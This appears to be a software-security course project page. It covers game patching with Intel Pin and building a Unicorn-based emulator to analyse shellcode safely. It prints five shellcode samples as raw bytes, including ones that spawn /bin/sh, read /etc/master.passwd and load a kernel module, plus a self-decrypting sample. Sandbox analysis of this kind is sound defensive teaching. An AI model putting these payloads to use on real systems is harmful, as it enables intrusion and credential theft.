$ cd
$ wget https://yonghwi-kwon.github.io/class/softsec/pin/pin.sh
$ chmod +x pin.sh
$ ./pin.sh
pin
binary in your home folder, the installation is successful.You are given the Moon-buggy game. Your goal is to use Intel Pin to make the moon buggy keep going even after crashes.
First, watch the video. It shows two moon buggy executions.
You need to figure out how to make your own Pin tool that achieves the same goal: make the moon buggy keep going after crashes. You are supposed to figure this out by yourself by analyzing the source code.
$ sudo apt-get install autoconf automake texinfo
$ sudo apt-get install libncurses5-dev libncursesw5-dev
$ ./autogen.sh
$ ./configure
$ make
$ wget https://yonghwi-kwon.github.io/class/softsec/project/prj1.sh
$ chmod +x prj1.sh
$ ./prj1.sh
The buggy has a laser that can be fired by key a
. Whenever you do, it would deduct your game score. Can you make it increase the score? (e.g., everytime you use the laser, you gain 10000 scores)
Remote exploitation of vulnerable program is a common tactic in cyber attacks. Typically, an attacker sends maliciously crafted inputs to a vulnerable program. Such an input often consists of two parts: a malicious payload, which will be executed after a successful exploitation, and an input exploits the vulnerability to hijack the control flow to redirect it to the injected payload.
The above figure shows an example scenario.
/bin/sh
.Since the malicious payload is essentially code bytes of a sequence of instructions, it can be anything. In practice, there are two typical forms of malicious payload: shellcode or ROP.
In this project, we only focus on shellcode. The following website gives a few examples of popular shellcode: http://shell-storm.org/shellcode/.
Assume that you obtain a potential malicious payload (e.g., from network logs), you would like to know what they are doing. Executing them on a real machine or VM is a viable option, but it will also harm the entire VM or machine if the exploitation is successful. Sandboxing is a technique that can run the program while preventing the target program making any harm to the host system. In practice, sandboxing is commonly used to execute potentially malicious code or program as it can observe malicious actions without harming the host system.
This project asks you to create a sandboxing tool that execute them safely using code emulation techniques. Specifically, give a sequence of code bytes (i.e., instructions), you run them and report what actions they make (e.g., call a system call, doing a particular computations, etc.).
You are given the below shellcode examples. Your goal is to make your program properly interpret their executions (e.g., what system calls were made with which arguments):
CODE_EXAMPLE1
\x6a\x30\x58\x6a\x05\x5b\xeb\x05\x59\xcd\x80\xcc\x40\xe8\xf6\xff\xff\xff\x99\xb0
\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x54\xeb\xe1
CODE_EXAMPLE2
\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80
CODE_EXAMPLE3
\x31\xc0\x50\x50\xb0\x17\xcd\x80\xeb\x1f\x5e\x50\x68\x2f\x63\x61\x74\x68\x2f\x62
\x69\x6e\x89\xe3\x50\x56\x53\x89\xe2\x50\x52\x53\xb0\x0b\x50\xcd\x80\x50\x50\xcd
\x80\xe8\xdc\xff\xff\xff\x2f\x65\x74\x63\x2f\x6d\x61\x73\x74\x65\x72\x2e\x70\x61
\x73\x73\x77\x64
CODE_EXAMPLE4
\xeb\x2c\x5e\x31\xc0\xb0\x17\x50\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f
\x2f\x62\x69\x89\xe3\x50\x66\x68\x2d\x63\x89\xe7\x50\x56\x57\x53\x89\xe7\x50\x57
\x53\x50\xb0\x0b\xcd\x80\xe8\xcf\xff\xff\xff\x2f\x73\x62\x69\x6e\x2f\x6b\x6c\x64
\x6c\x6f\x61\x64\x20\x2f\x74\x6d\x70\x2f\x6f\x2e\x6f
CODE_EXAMPLE5
\x31\xd2\xeb\x0e\x31\xdb\x5b\xb1\x19\x83\x2c\x1a\x01\x42\xe2\xf9\xeb\x05\xe8\xed
\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x32\xdc\x8a\xe4
\x51\x55\x54\x51\xb1\x0c\xce\x81
You are given to a program emul.py
which leverages the unicorn framework to run a given shellcode and produce executed instructions and results.
The program is already capable of executing a simple shellcode that does not cause any errors and uses a few system calls.
Syscall Number | Syscall Name |
---|---|
1 | sys_exit |
4 | sys_write |
11 | sys_execv |
48 | sys_signal |
The program is already capable of running the first two shellcode samples: CODE_EXAMPLE1
and CODE_EXAMPLE2
.
The below screenshot is an example of executing CODE_EXAMPLE1
with the provided program:
The program is configured as follows:
0x1000000
0x1200000
continue
command below).continue
command, that can execute the remaining instructions that are not covered.
continue
two more times will give you the following output, meaning that there no remaining instructions to execute.
continue
is implemented, search inst_remain
variable in project3.py
and check the related code.While Code Example 1 and 2 are already supported, Example 3, 4, and 5 are not supported correctly.
Your goal is to add the code to support them. Here is the list of challenges and potential solutions.
elif
for the system call 0 and print a message (not an error message) would be sufficient.Are we executing a string?
when an address that is known to be a string is executed):
Example 5's shellcode is encrypted. The below is the shellcode.
0: 31 d2 xor edx,edx
2: eb 0e jmp 0x12
4: 31 db xor ebx,ebx
6: 5b pop ebx
7: b1 19 mov cl,0x19
9: 83 2c 1a 01 sub DWORD PTR [edx+ebx*1],0x1
d: 42 inc edx
e: e2 f9 loop 0x9
10: eb 05 jmp 0x17
12: e8 ed ff ff ff call 0x4
17: 32 c1 xor al,cl
19: 51 push ecx
1a: 69 30 30 74 69 69 imul esi,DWORD PTR [eax],0x69697430
20: 30 63 6a xor BYTE PTR [ebx+0x6a],ah
23: 6f outs dx,DWORD PTR ds:[esi]
24: 32 dc xor bl,ah
26: 8a e4 mov ah,ah
28: 51 push ecx
29: 55 push ebp
2a: 54 push esp
2b: 51 push ecx
2c: b1 0c mov cl,0xc
2e: ce into
2f: 81 .byte 0x81
Observe that the execution flow: 0 -> 2 -> 12 -> 4 -> 6 -> 7 -> 9 -> d -> …
In particular, see the loop between 9
to e
.
9: 83 2c 1a 01 sub DWORD PTR [edx+ebx*1],0x1
d: 42 inc edx
e: e2 f9 loop 0x9
The loop does a very simple decryption (value = value - 1), where the target buffer of this decryption is the code from 17
.
0: 31 d2 xor edx,edx
2: eb 0e jmp 0x12 ----------------------------|
4: 31 db xor ebx,ebx <------------------------|--|
6: 5b pop ebx | |
7: b1 19 mov cl,0x19 | |
9: 83 2c 1a 01 sub DWORD PTR [edx+ebx*1],0x1 | |
d: 42 inc edx | |
e: e2 f9 loop 0x9 | |
10: eb 05 jmp 0x17 | |
12: e8 ed ff ff ff call 0x4 <---------------------------|--|
--------------------------------------------
17: 32 c1 xor al,cl
...
If we manually apply the decryption, we get the following code:
0: 31 d2 xor edx,edx
2: eb 0e jmp 0x12
4: 31 db xor ebx,ebx
6: 5b pop ebx
7: b1 19 mov cl,0x19
9: 83 2c 1a 01 sub DWORD PTR [edx+ebx*1],0x1
d: 42 inc edx
e: e2 f9 loop 0x9
10: eb 05 jmp 0x17
12: e8 ed ff ff ff call 0x4
--------------------------------------------
17: 31 c0 xor eax,eax
19: 50 push eax
1a: 68 2f 2f 73 68 push 0x68732f2f
1f: 68 2f 62 69 6e push 0x6e69622f
24: 31 db xor ebx,ebx
26: 89 e3 mov ebx,esp
28: 50 push eax
29: 54 push esp
2a: 53 push ebx
2b: 50 push eax
2c: b0 0b mov al,0xb
2e: cd 80 int 0x80
Now, your goal is to improve the program to handle this code.
If you run the project3.py
that we modified so far, you will get the following screenshot.
Currently, the program stops analysis if it encounters the same instruction twice within the same execution.
See the below code in hook_code()
.
# callback for tracing instructions
def hook_code(uc, address, size, user_data):
...
elif address in inst_executed_local:
if address in cnt_repeated:
cnt_repeated[address] = cnt_repeated[address] + 1
else:
cnt_repeated[address] = 1
output = "Already covered (stop analysis):: addr %x (repeated: %d)" % (address, cnt_repeated[address])
out(output)
uc.emu_stop()
return
This code will terminate the analysis uc.emu_stop()
when there is any instruction executed more than once (see the condition at line 4).
As we saw, the decryption requires a loop. So, you have to allow them to execute instructions repeatedly. In this homework, you are asked to run each instruction up to 100 times.
After you do, we get the following result:
Now, we can execute the first system call but, continue
for the decrypted code does not work.
Observe that the code is the original code, that are not correctly decrypted.
This is because when we run the program again, we lost the previous memory state that has the decrypted code.
The last piece of this project is to save the memory state at the end of the execution and load them in the next run.
The final outcome should allow you to run the program twice more, covering SYS_EXECVE twice with different arguments.
emul.py
and emul_util.py
. Put them in the bindings
folder.
$ wget https://yonghwi-kwon.github.io/class/softsec/project/prj2.sh
$ chmod +x prj2.sh
$ ./prj2.sh